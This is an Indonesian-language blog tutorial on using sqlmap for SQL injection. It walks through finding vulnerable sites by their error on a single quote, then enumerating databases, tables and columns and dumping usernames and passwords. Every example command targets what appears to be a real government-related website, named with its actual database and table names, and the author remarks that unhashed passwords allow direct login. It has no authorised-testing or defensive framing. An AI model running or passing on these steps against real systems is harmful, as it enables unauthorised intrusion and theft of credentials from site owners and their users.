Oke kali ini saya mau share tutorial SQL Injection dengan bantuan sqlmap. Tutor lama sih sebenarnya. Share aja barangkali ada yang kurang paham dengan tutor yang pernah dibaca maka ane mau share lagi dengan sejelas jelas nya.
Sebelum membaca tutor lebih lanjut , pastikan kalian yang pengguna windows sudah menginstall python.
Download python
Download Sqlmap
Setelah Python diinstall, unzip sqlmap nya . Ane sendiri meletakan nya di C:/tools/sqlmap . Silahkan sesuaikan sendiri.
Mulai mencari target yang vuln sqli. Pasti tau kan ? yang ketika diberi string tanda petik satu (') akan muncul error.
Saatnya eksekusi :v
Buka sqlmap nya.
run cmd , lalu ketik cd/tools/sqlmap <-- sesuaikan sendiri dimana kalian tadi meletakkan folder sqlmap nya.
setelah itu masukkan command sqlmap.py -u url_vuln --dbs
contoh
sqlmap.py -u http://kpubanjarmasin.com/berita.php?id=253 --dbs
nah, ketemu tuh nama database nya.
Lanjut ke command berikut nya
sqlmap.py -u url_vuln -D nama_database --tables
contoh
sqlmap.py -u http://kpubanjarmasin.com/berita.php?id=253 -D ymsfrtlp_data --tables
Nah muncul tuh table dalam database nya.
Lanjut ke command berikut nya :
sqlmap.py -u nama_site -D nama_database -T nama_table --columns
contoh
sqlmap.py -u http://kpubanjarmasin.com/berita.php?id=253 -D ymsfrtlp_data -T tabeluser --columns <-- pilih nama table yang kira kira berisi password dan username nya.
Yosshhh.. muncul daftar column nya. Searang saat nya melihat isi dari user dan password.
sqlmap.py -u nama_site -Dnama_db -T nama_table -C nama_kolom --dump <-- jika kolom lebih darisatu pisahkan dengan tanda koma.
contoh
sqlmap.py -u http://kpubanjarmasin.com/berita.php?id=253 -D ymsfrtlp_data -T tabeluser -C userid,password --dump
Nah, udah keliatan kan user sama pass nya. Kadang ada yang di hash tapi kalo beruntung ya tinggal login . Pass nya gak di hash.
Dorr !
Sekian tutorial kali ini . Semoga bermanfaat :)
0 komentar:
Posting Komentar